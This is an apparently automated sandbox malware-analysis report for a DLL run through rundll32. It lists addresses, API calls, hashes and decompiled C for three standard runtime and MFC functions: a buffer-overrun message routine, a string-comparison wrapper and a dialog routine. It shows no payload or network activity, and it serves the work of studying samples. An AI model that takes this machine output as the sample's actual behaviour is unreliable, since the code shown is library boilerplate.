                                                                                                            0x10016d2f
                                                                                                            0x10016d32
                                                                                                            0x00000000
                                                                                                            0x10016d34
                                                                                                            0x10016d34
                                                                                                            0x10016d37
                                                                                                            0x10016d3c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016d3c
                                                                                                            0x10016d32
                                                                                                            0x10016d2d
                                                                                                            0x10016d29
                                                                                                            0x10016d21
                                                                                                            0x10016d1d
                                                                                                            0x00000000
                                                                                                            0x10016d18
                                                                                                            0x10016d44
                                                                                                            0x10016d44
                                                                                                            0x10016d4b
                                                                                                            0x10016d4b
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,10042558,00000118,10011796,00000001,00000000,10041D50,00000008,10016B00,00000000,00000000,00000000), ref: 10016C2B
                                                                                                            • _strlen.LIBCMT ref: 10016C51
                                                                                                            • _strlen.LIBCMT ref: 10016C62
                                                                                                            • _strncpy.LIBCMT ref: 10016C7C
                                                                                                            • _strlen.LIBCMT ref: 10016C85
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _strlen$FileModuleName_strncpy
                                                                                                            • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                                                                                            • API String ID: 2455649890-1673886896
                                                                                                            • Opcode ID: 1963d9bee1367311d52fddb125b014c05f3a23a3ac48ca314c1b8795c44db6bb
                                                                                                            • Instruction ID: 88295e5d41c60b50e9a3e58cda1e4c53c685b81e948abb858cf034152a287b35
                                                                                                            • Opcode Fuzzy Hash: 1963d9bee1367311d52fddb125b014c05f3a23a3ac48ca314c1b8795c44db6bb
                                                                                                            • Instruction Fuzzy Hash: 6731B476A052146BDB15DB60CC82FDE36B8EF05214F600169F514EF142DB38EBD18BA9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001C425 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 291COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E1001C425(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t94;
				int _t95;
				int _t98;
				short* _t106;
				int _t109;
				short* _t111;
				short* _t118;
				short* _t119;
				short* _t126;
				char* _t132;
				char* _t133;
				long _t139;
				int _t141;
				int _t142;
				int _t143;
				int _t144;
				char _t154;
				char _t156;
				short* _t159;
				short* _t160;
				short* _t162;
				int _t165;
				void* _t166;
				void* _t167;
				short* _t168;
				void* _t173;

				_push(0x40);
				_push(0x10042fa0);
				E10012514(__ebx, __edi, __esi);
				_t94 =  *0x1004c470; // 0x6edecb8c
				 *((intOrPtr*)(_t167 - 0x1c)) = _t94;
				_t162 = 0;
				_t165 = 1;
				_t173 =  *0x1004f8b0 - _t162; // 0x0
				if(_t173 == 0) {
					if(CompareStringW(0, 0, 0x10042704, 1, 0x10042704, 1) == 0) {
						_t139 = GetLastError();
						__eflags = _t139 - 0x78;
						if(_t139 == 0x78) {
							 *0x1004f8b0 = 2;
						}
					} else {
						 *0x1004f8b0 = 1;
					}
				}
				if( *(_t167 + 0x14) > _t162) {
					 *(_t167 + 0x14) = E1001C409( *(_t167 + 0x10),  *(_t167 + 0x14));
				}
				_t95 =  *(_t167 + 0x1c);
				if(_t95 > _t162) {
					_t95 = E1001C409( *(_t167 + 0x18), _t95);
					 *(_t167 + 0x1c) = _t95;
				}
				_t144 =  *0x1004f8b0; // 0x0
				_t141 = 2;
				if(_t144 == _t141 || _t144 == _t162) {
					 *(_t167 - 0x38) = _t162;
					__eflags =  *(_t167 + 8) - _t162;
					if( *(_t167 + 8) == _t162) {
						_t109 =  *0x1004f724; // 0x0
						 *(_t167 + 8) = _t109;
					}
					_t142 =  *(_t167 + 0x20);
					__eflags = _t142 - _t162;
					if(_t142 == _t162) {
						_t142 =  *0x1004f734; // 0x0
					}
					_t166 = E1001A444(_t142,  *(_t167 + 8));
					__eflags = _t166 - 0xffffffff;
					if(_t166 != 0xffffffff) {
						__eflags = _t166 - _t142;
						if(__eflags == 0) {
							L67:
							_t165 = CompareStringA( *(_t167 + 8),  *(_t167 + 0xc),  *(_t167 + 0x10),  *(_t167 + 0x14),  *(_t167 + 0x18),  *(_t167 + 0x1c));
							__eflags = _t162;
							if(__eflags != 0) {
								_push(_t162);
								E100107C8(_t142, _t162, _t165, __eflags);
								_push( *(_t167 - 0x38));
								E100107C8(_t142, _t162, _t165, __eflags);
							}
							goto L69;
						}
						_push(0);
						_push(0);
						_push(_t167 + 0x14);
						_push( *(_t167 + 0x10));
						_push(_t166);
						_push(_t142);
						_t162 = E1001A487(_t142, _t162, _t166, __eflags);
						__eflags = _t162;
						if(__eflags == 0) {
							goto L61;
						}
						_push(0);
						_push(0);
						_push(_t167 + 0x1c);
						_push( *(_t167 + 0x18));
						_push(_t166);
						_push(_t142);
						_t106 = E1001A487(_t142, _t162, _t166, __eflags);
						 *(_t167 - 0x38) = _t106;
						__eflags = _t106;
						if(__eflags != 0) {
							 *(_t167 + 0x10) = _t162;
							 *(_t167 + 0x18) =  *(_t167 - 0x38);
							goto L67;
						}
						_push(_t162);
						E100107C8(_t142, _t162, _t166, __eflags);
					}
					goto L61;
				} else {
					if(_t144 != _t165) {
						L61:
						_t98 = 0;
						L70:
						return E1001254F(E100117AE(_t98,  *((intOrPtr*)(_t167 - 0x1c))));
					}
					 *(_t167 - 0x3c) = _t162;
					 *(_t167 - 0x44) = _t162;
					 *(_t167 - 0x40) = _t162;
					if( *(_t167 + 0x20) == _t162) {
						_t144 =  *0x1004f734; // 0x0
						 *(_t167 + 0x20) = _t144;
					}
					if( *(_t167 + 0x14) == _t162 || _t95 == _t162) {
						if( *(_t167 + 0x14) != _t95) {
							__eflags = _t95 - _t165;
							if(_t95 > _t165) {
								L69:
								_t98 = _t165;
								goto L70;
							}
							__eflags =  *(_t167 + 0x14) - _t165;
							if( *(_t167 + 0x14) <= _t165) {
								_t111 = GetCPInfo( *(_t167 + 0x20), _t167 - 0x30);
								__eflags = _t111;
								if(_t111 == 0) {
									goto L61;
								}
								__eflags =  *(_t167 + 0x14) - _t162;
								if( *(_t167 + 0x14) <= _t162) {
									__eflags =  *(_t167 + 0x1c) - _t162;
									if( *(_t167 + 0x1c) <= _t162) {
										goto L38;
									}
									__eflags =  *(_t167 - 0x30) - _t141;
									if( *(_t167 - 0x30) < _t141) {
										goto L69;
									}
									_t132 = _t167 - 0x2a;
									__eflags =  *((char*)(_t167 - 0x2a));
									if( *((char*)(_t167 - 0x2a)) == 0) {
										goto L69;
									} else {
										goto L33;
									}
									while(1) {
										L33:
										_t159 =  *((intOrPtr*)(_t132 + 1));
										__eflags = _t159;
										if(_t159 == 0) {
											goto L69;
										}
										_t154 =  *( *(_t167 + 0x18));
										__eflags = _t154 -  *_t132;
										if(_t154 <  *_t132) {
											L36:
											_t132 = _t132 + _t141;
											__eflags =  *_t132;
											if( *_t132 != 0) {
												continue;
											}
											goto L69;
										}
										__eflags = _t154 - _t159;
										if(_t154 <= _t159) {
											goto L17;
										}
										goto L36;
									}
									goto L69;
								}
								__eflags =  *(_t167 - 0x30) - _t141;
								if( *(_t167 - 0x30) < _t141) {
									goto L20;
								}
								_t133 = _t167 - 0x2a;
								__eflags =  *((char*)(_t167 - 0x2a));
								if( *((char*)(_t167 - 0x2a)) == 0) {
									goto L20;
								} else {
									goto L25;
								}
								while(1) {
									L25:
									_t160 =  *((intOrPtr*)(_t133 + 1));
									__eflags = _t160;
									if(_t160 == 0) {
										goto L20;
									}
									_t156 =  *( *(_t167 + 0x10));
									__eflags = _t156 -  *_t133;
									if(_t156 <  *_t133) {
										L28:
										_t133 = _t133 + _t141;
										__eflags =  *_t133;
										if( *_t133 != 0) {
											continue;
										}
										goto L20;
									}
									__eflags = _t156 - _t160;
									if(_t156 <= _t160) {
										goto L17;
									}
									goto L28;
								}
							}
							L20:
							_t98 = 3;
							goto L70;
						}
						L17:
						_t98 = _t141;
						goto L70;
					} else {
						L38:
						_t143 = MultiByteToWideChar( *(_t167 + 0x20), 9,  *(_t167 + 0x10),  *(_t167 + 0x14), _t162, _t162);
						 *(_t167 - 0x48) = _t143;
						__eflags = _t143 - _t162;
						if(_t143 == _t162) {
							goto L61;
						}
						 *(_t167 - 4) = _t162;
						E10010B20(_t143 + _t143 + 0x00000003 & 0xfffffffc, _t144);
						 *(_t167 - 0x18) = _t168;
						 *(_t167 - 0x34) = _t168;
						 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
						_t118 =  *(_t167 - 0x34);
						__eflags = _t118 - _t162;
						if(_t118 != _t162) {
							L43:
							_t119 = MultiByteToWideChar( *(_t167 + 0x20), _t165,  *(_t167 + 0x10),  *(_t167 + 0x14), _t118, _t143);
							__eflags = _t119;
							if(_t119 == 0) {
								L53:
								__eflags =  *(_t167 - 0x3c);
								if(__eflags != 0) {
									_push( *(_t167 - 0x34));
									E100107C8(_t143, _t162, _t165, __eflags);
								}
								_t98 =  *(_t167 - 0x40);
								goto L70;
							}
							_t165 = MultiByteToWideChar( *(_t167 + 0x20), 9,  *(_t167 + 0x18),  *(_t167 + 0x1c), 0, 0);
							 *(_t167 - 0x4c) = _t165;
							__eflags = _t165;
							if(_t165 == 0) {
								goto L53;
							}
							 *(_t167 - 4) = 1;
							E10010B20(_t165 + _t165 + 0x00000003 & 0xfffffffc, _t144);
							 *(_t167 - 0x18) = _t168;
							_t162 = _t168;
							 *(_t167 - 0x50) = _t162;
							 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
							__eflags = _t162;
							if(_t162 != 0) {
								L49:
								_t126 = MultiByteToWideChar( *(_t167 + 0x20), 1,  *(_t167 + 0x18),  *(_t167 + 0x1c), _t162, _t165);
								__eflags = _t126;
								if(_t126 != 0) {
									 *(_t167 - 0x40) = CompareStringW( *(_t167 + 8),  *(_t167 + 0xc),  *(_t167 - 0x34), _t143, _t162, _t165);
								}
								__eflags =  *(_t167 - 0x44);
								if(__eflags != 0) {
									_push(_t162);
									E100107C8(_t143, _t162, _t165, __eflags);
								}
								goto L53;
							} else {
								_t162 = E100107B6(_t165 + _t165);
								__eflags = _t162;
								if(_t162 == 0) {
									goto L53;
								}
								 *(_t167 - 0x44) = 1;
								goto L49;
							}
						} else {
							_t118 = E100107B6(_t143 + _t143);
							_pop(_t144);
							 *(_t167 - 0x34) = _t118;
							__eflags = _t118 - _t162;
							if(_t118 == _t162) {
								goto L61;
							}
							 *(_t167 - 0x3c) = _t165;
							goto L43;
						}
					}
				}
			}





























                                                                                                            0x1001c425
                                                                                                            0x1001c427
                                                                                                            0x1001c42c
                                                                                                            0x1001c431
                                                                                                            0x1001c436
                                                                                                            0x1001c439
                                                                                                            0x1001c43d
                                                                                                            0x1001c43e
                                                                                                            0x1001c444
                                                                                                            0x1001c459
                                                                                                            0x1001c463
                                                                                                            0x1001c469
                                                                                                            0x1001c46c
                                                                                                            0x1001c46e
                                                                                                            0x1001c46e
                                                                                                            0x1001c45b
                                                                                                            0x1001c45b
                                                                                                            0x1001c45b
                                                                                                            0x1001c459
                                                                                                            0x1001c47b
                                                                                                            0x1001c489
                                                                                                            0x1001c489
                                                                                                            0x1001c48c
                                                                                                            0x1001c491
                                                                                                            0x1001c497
                                                                                                            0x1001c49d
                                                                                                            0x1001c49d
                                                                                                            0x1001c4a0
                                                                                                            0x1001c4a8
                                                                                                            0x1001c4ab
                                                                                                            0x1001c6ea
                                                                                                            0x1001c6ed
                                                                                                            0x1001c6f0
                                                                                                            0x1001c6f2
                                                                                                            0x1001c6f7
                                                                                                            0x1001c6f7
                                                                                                            0x1001c6fa
                                                                                                            0x1001c6fd
                                                                                                            0x1001c6ff
                                                                                                            0x1001c701
                                                                                                            0x1001c701
                                                                                                            0x1001c710
                                                                                                            0x1001c712
                                                                                                            0x1001c715
                                                                                                            0x1001c71b
                                                                                                            0x1001c71d
                                                                                                            0x1001c768
                                                                                                            0x1001c780
                                                                                                            0x1001c782
                                                                                                            0x1001c784
                                                                                                            0x1001c786
                                                                                                            0x1001c787
                                                                                                            0x1001c78c
                                                                                                            0x1001c78f
                                                                                                            0x1001c795
                                                                                                            0x00000000
                                                                                                            0x1001c784
                                                                                                            0x1001c71f
                                                                                                            0x1001c721
                                                                                                            0x1001c726
                                                                                                            0x1001c727
                                                                                                            0x1001c72a
                                                                                                            0x1001c72b
                                                                                                            0x1001c734
                                                                                                            0x1001c736
                                                                                                            0x1001c738
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c73a
                                                                                                            0x1001c73c
                                                                                                            0x1001c741
                                                                                                            0x1001c742
                                                                                                            0x1001c745
                                                                                                            0x1001c746
                                                                                                            0x1001c747
                                                                                                            0x1001c74f
                                                                                                            0x1001c752
                                                                                                            0x1001c754
                                                                                                            0x1001c75f
                                                                                                            0x1001c765
                                                                                                            0x00000000
                                                                                                            0x1001c765
                                                                                                            0x1001c756
                                                                                                            0x1001c757
                                                                                                            0x1001c75c
                                                                                                            0x00000000
                                                                                                            0x1001c4b9
                                                                                                            0x1001c4bb
                                                                                                            0x1001c717
                                                                                                            0x1001c717
                                                                                                            0x1001c798
                                                                                                            0x1001c7a8
                                                                                                            0x1001c7a8
                                                                                                            0x1001c4c1
                                                                                                            0x1001c4c4
                                                                                                            0x1001c4c7
                                                                                                            0x1001c4cd
                                                                                                            0x1001c4cf
                                                                                                            0x1001c4d5
                                                                                                            0x1001c4d5
                                                                                                            0x1001c4db
                                                                                                            0x1001c4e8
                                                                                                            0x1001c4f1
                                                                                                            0x1001c4f3
                                                                                                            0x1001c796
                                                                                                            0x1001c796
                                                                                                            0x00000000
                                                                                                            0x1001c796
                                                                                                            0x1001c4f9
                                                                                                            0x1001c4fc
                                                                                                            0x1001c50d
                                                                                                            0x1001c513
                                                                                                            0x1001c515
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c51b
                                                                                                            0x1001c51e
                                                                                                            0x1001c54b
                                                                                                            0x1001c54e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c550
                                                                                                            0x1001c553
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c559
                                                                                                            0x1001c55c
                                                                                                            0x1001c560
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c566
                                                                                                            0x1001c566
                                                                                                            0x1001c566
                                                                                                            0x1001c569
                                                                                                            0x1001c56b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c574
                                                                                                            0x1001c576
                                                                                                            0x1001c578
                                                                                                            0x1001c582
                                                                                                            0x1001c582
                                                                                                            0x1001c584
                                                                                                            0x1001c587
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c589
                                                                                                            0x1001c57a
                                                                                                            0x1001c57c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c57c
                                                                                                            0x00000000
                                                                                                            0x1001c566
                                                                                                            0x1001c520
                                                                                                            0x1001c523
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c525
                                                                                                            0x1001c528
                                                                                                            0x1001c52c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c52e
                                                                                                            0x1001c52e
                                                                                                            0x1001c52e
                                                                                                            0x1001c531
                                                                                                            0x1001c533
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c538
                                                                                                            0x1001c53a
                                                                                                            0x1001c53c
                                                                                                            0x1001c542
                                                                                                            0x1001c542
                                                                                                            0x1001c544
                                                                                                            0x1001c547
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c549
                                                                                                            0x1001c53e
                                                                                                            0x1001c540
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c540
                                                                                                            0x1001c52e
                                                                                                            0x1001c4fe
                                                                                                            0x1001c500
                                                                                                            0x00000000
                                                                                                            0x1001c500
                                                                                                            0x1001c4ea
                                                                                                            0x1001c4ea
                                                                                                            0x00000000
                                                                                                            0x1001c58e
                                                                                                            0x1001c58e
                                                                                                            0x1001c5a1
                                                                                                            0x1001c5a3
                                                                                                            0x1001c5a6
                                                                                                            0x1001c5a8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c5ae
                                                                                                            0x1001c5ba
                                                                                                            0x1001c5bf
                                                                                                            0x1001c5c4
                                                                                                            0x1001c5c7
                                                                                                            0x1001c5e9
                                                                                                            0x1001c5ec
                                                                                                            0x1001c5ee
                                                                                                            0x1001c608
                                                                                                            0x1001c614
                                                                                                            0x1001c61a
                                                                                                            0x1001c61c
                                                                                                            0x1001c6d3
                                                                                                            0x1001c6d3
                                                                                                            0x1001c6d7
                                                                                                            0x1001c6d9
                                                                                                            0x1001c6dc
                                                                                                            0x1001c6e1
                                                                                                            0x1001c6e2
                                                                                                            0x00000000
                                                                                                            0x1001c6e2
                                                                                                            0x1001c637
                                                                                                            0x1001c639
                                                                                                            0x1001c63c
                                                                                                            0x1001c63e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c644
                                                                                                            0x1001c654
                                                                                                            0x1001c659
                                                                                                            0x1001c65c
                                                                                                            0x1001c65e
                                                                                                            0x1001c661
                                                                                                            0x1001c67f
                                                                                                            0x1001c681
                                                                                                            0x1001c69a
                                                                                                            0x1001c6a7
                                                                                                            0x1001c6ad
                                                                                                            0x1001c6af
                                                                                                            0x1001c6c3
                                                                                                            0x1001c6c3
                                                                                                            0x1001c6c6
                                                                                                            0x1001c6ca
                                                                                                            0x1001c6cc
                                                                                                            0x1001c6cd
                                                                                                            0x1001c6d2
                                                                                                            0x00000000
                                                                                                            0x1001c683
                                                                                                            0x1001c68d
                                                                                                            0x1001c68f
                                                                                                            0x1001c691
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c693
                                                                                                            0x00000000
                                                                                                            0x1001c693
                                                                                                            0x1001c5f0
                                                                                                            0x1001c5f4
                                                                                                            0x1001c5f9
                                                                                                            0x1001c5fa
                                                                                                            0x1001c5fd
                                                                                                            0x1001c5ff
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c605
                                                                                                            0x00000000
                                                                                                            0x1001c605
                                                                                                            0x1001c5ee
                                                                                                            0x1001c4db

                                                                                                            APIs
                                                                                                            • CompareStringW.KERNEL32(00000000,00000000,10042704,00000001,10042704,00000001,10042FA0,00000040,1001BF03,?,00000001,?,00000000,?,00000000,?), ref: 1001C451
                                                                                                            • GetLastError.KERNEL32(?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC,10042CD0,00000018,10019429,10042CE0,00000008,10013474), ref: 1001C463
                                                                                                            • GetCPInfo.KERNEL32(00000000,00000000,10042FA0,00000040,1001BF03,?,00000001,?,00000000,?,00000000,?,?,1001AE49,00000000,00000000), ref: 1001C50D
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000004,00000000,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C59B
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C614
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,100101C3,00000000,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C631
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,100101C3,?,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C6A7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$CompareErrorInfoLastString
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 1773772771-4125583295
                                                                                                            • Opcode ID: c77f23d90567df6e736b9aafa9777b77d817b83e23b873e610d66b8219189818
                                                                                                            • Instruction ID: f9a15a39c5567b5c4af314f3663c8d3c96b15f003a3eabc65cf21064ebdc607f
                                                                                                            • Opcode Fuzzy Hash: c77f23d90567df6e736b9aafa9777b77d817b83e23b873e610d66b8219189818
                                                                                                            • Instruction Fuzzy Hash: DCB1897690825EAFDF22CFA4DC95EAE7BF6EF05690F200119F840AA1A1D771D9D0CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001F2DE Relevance: 16.6, APIs: 11, Instructions: 120COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 92%
                                                                                                            			E1001F2DE(intOrPtr* __ecx) {
				signed int _t45;
				void* _t49;
				CHAR* _t50;
				signed int _t54;
				signed char _t60;
				struct HWND__* _t62;
				CHAR* _t63;
				signed int _t68;
				struct HINSTANCE__* _t81;
				void* _t83;
				intOrPtr* _t85;
				void* _t87;
				void* _t89;

				E10011BF0(0x1003a3e8, _t87);
				_t85 = __ecx;
				_t68 =  *(__ecx + 0x5c);
				 *((intOrPtr*)(_t87 - 0x10)) = _t89 - 0x18;
				 *((intOrPtr*)(_t87 - 0x1c)) = __ecx;
				 *(_t87 - 0x18) =  *(__ecx + 0x58);
				_t45 = E100373B5();
				_t81 =  *(_t45 + 0xc);
				if( *(_t85 + 0x54) != 0) {
					_t81 =  *(E100373B5() + 0xc);
					_t45 = LoadResource(_t81, FindResourceA(_t81,  *(_t85 + 0x54), 5));
					 *(_t87 - 0x18) = _t45;
				}
				if( *(_t87 - 0x18) != 0) {
					_t45 = LockResource( *(_t87 - 0x18));
					_t68 = _t45;
				}
				if(_t68 != 0) {
					 *(_t87 - 0x14) = E1001EE1E(_t85);
					E10022196();
					 *(_t87 - 0x20) =  *(_t87 - 0x20) & 0x00000000;
					__eflags =  *(_t87 - 0x14);
					if( *(_t87 - 0x14) != 0) {
						_t62 = GetDesktopWindow();
						__eflags =  *(_t87 - 0x14) - _t62;
						if( *(_t87 - 0x14) != _t62) {
							_t63 = IsWindowEnabled( *(_t87 - 0x14));
							__eflags = _t63;
							if(_t63 != 0) {
								EnableWindow( *(_t87 - 0x14), 0);
								 *(_t87 - 0x20) = 1;
							}
						}
					}
					 *(_t87 - 4) =  *(_t87 - 4) & 0x00000000;
					_push(_t85);
					E100237EE();
					_t49 = E100220EE(_t87,  *(_t87 - 0x14));
					_push(_t81);
					_push(_t49);
					_push(_t68);
					_t50 = E1001F0D1(_t85);
					__eflags = _t50;
					if(_t50 != 0) {
						__eflags =  *(_t85 + 0x38) & 0x00000010;
						if(( *(_t85 + 0x38) & 0x00000010) != 0) {
							_t83 = 4;
							_t60 = E100202AB(_t85);
							__eflags = _t60 & 0x00000001;
							if((_t60 & 0x00000001) != 0) {
								_t83 = 5;
							}
							E10021B92(_t85, _t83);
						}
						__eflags =  *(_t85 + 0x1c);
						if( *(_t85 + 0x1c) != 0) {
							E100204FE(_t85, 0, 0, 0, 0, 0, 0x97);
						}
					}
					 *(_t87 - 4) =  *(_t87 - 4) | 0xffffffff;
					__eflags =  *(_t87 - 0x20);
					if( *(_t87 - 0x20) != 0) {
						EnableWindow( *(_t87 - 0x14), 1);
					}
					__eflags =  *(_t87 - 0x14);
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *(_t85 + 0x1c);
						if(__eflags == 0) {
							SetActiveWindow( *(_t87 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t85 + 0x60))();
					E1001EE58(_t85, __eflags);
					__eflags =  *(_t85 + 0x54);
					if( *(_t85 + 0x54) != 0) {
						FreeResource( *(_t87 - 0x18));
					}
					_t54 =  *(_t85 + 0x40);
				} else {
					_t54 = _t45 | 0xffffffff;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t87 - 0xc));
				return _t54;
			}
















                                                                                                            0x1001f2e3
                                                                                                            0x1001f2ed
                                                                                                            0x1001f2f2
                                                                                                            0x1001f2f6
                                                                                                            0x1001f2f9
                                                                                                            0x1001f2fc
                                                                                                            0x1001f2ff
                                                                                                            0x1001f308
                                                                                                            0x1001f30b
                                                                                                            0x1001f312
                                                                                                            0x1001f323
                                                                                                            0x1001f329
                                                                                                            0x1001f329
                                                                                                            0x1001f330
                                                                                                            0x1001f335
                                                                                                            0x1001f33b
                                                                                                            0x1001f33b
                                                                                                            0x1001f33f
                                                                                                            0x1001f350
                                                                                                            0x1001f353
                                                                                                            0x1001f358
                                                                                                            0x1001f35c
                                                                                                            0x1001f360
                                                                                                            0x1001f362
                                                                                                            0x1001f368
                                                                                                            0x1001f36b
                                                                                                            0x1001f370
                                                                                                            0x1001f376
                                                                                                            0x1001f378
                                                                                                            0x1001f37f
                                                                                                            0x1001f385
                                                                                                            0x1001f385
                                                                                                            0x1001f378
                                                                                                            0x1001f36b
                                                                                                            0x1001f38c
                                                                                                            0x1001f390
                                                                                                            0x1001f391
                                                                                                            0x1001f399
                                                                                                            0x1001f39e
                                                                                                            0x1001f39f
                                                                                                            0x1001f3a0
                                                                                                            0x1001f3a3
                                                                                                            0x1001f3aa
                                                                                                            0x1001f3ac
                                                                                                            0x1001f3ae
                                                                                                            0x1001f3b2
                                                                                                            0x1001f3b6
                                                                                                            0x1001f3b9
                                                                                                            0x1001f3be
                                                                                                            0x1001f3c1
                                                                                                            0x1001f3c5
                                                                                                            0x1001f3c5
                                                                                                            0x1001f3c9
                                                                                                            0x1001f3c9
                                                                                                            0x1001f3ce
                                                                                                            0x1001f3d1
                                                                                                            0x1001f3df
                                                                                                            0x1001f3df
                                                                                                            0x1001f3d1
                                                                                                            0x1001f400
                                                                                                            0x1001f404
                                                                                                            0x1001f407
                                                                                                            0x1001f40e
                                                                                                            0x1001f40e
                                                                                                            0x1001f414
                                                                                                            0x1001f417
                                                                                                            0x1001f41f
                                                                                                            0x1001f422
                                                                                                            0x1001f427
                                                                                                            0x1001f427
                                                                                                            0x1001f422
                                                                                                            0x1001f431
                                                                                                            0x1001f436
                                                                                                            0x1001f43b
                                                                                                            0x1001f43e
                                                                                                            0x1001f443
                                                                                                            0x1001f443
                                                                                                            0x1001f449
                                                                                                            0x1001f341
                                                                                                            0x1001f341
                                                                                                            0x1001f341
                                                                                                            0x1001f451
                                                                                                            0x1001f45a

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1001F2E3
                                                                                                            • FindResourceA.KERNEL32(?,00000000,00000005), ref: 1001F31B
                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F323
                                                                                                              • Part of subcall function 10022196: UnhookWindowsHookEx.USER32(?), ref: 100221BB
                                                                                                            • LockResource.KERNEL32(00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F335
                                                                                                            • GetDesktopWindow.USER32 ref: 1001F362
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 1001F370
                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 1001F37F
                                                                                                            • EnableWindow.USER32(00000000,00000001), ref: 1001F40E
                                                                                                            • GetActiveWindow.USER32 ref: 1001F419
                                                                                                            • SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F427
                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F443
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
